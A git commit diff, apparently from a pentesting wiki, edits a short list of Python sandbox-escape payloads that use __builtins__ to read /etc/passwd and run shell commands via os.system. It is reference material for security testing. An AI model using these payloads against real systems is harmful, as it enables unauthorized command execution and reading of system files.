GitBook: [#3652] No subject

This commit is contained in:
CPol 2022-11-05 10:56:30 +00:00 committed by gitbook-bot
parent d390f60bd4
commit 1db169095d
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -396,8 +396,8 @@ __builtins__["__import__"]('os').system('ls')
```python
# Possible payloads once you have found the builtins
.open("/etc/passwd").read()
.__import__("os").system("ls")
__builtins__["open"]("/etc/passwd").read()
__builtins__["__import__"]("os").system("ls")
# There are lots of other payloads that can be abused to execute commands
# See them below
```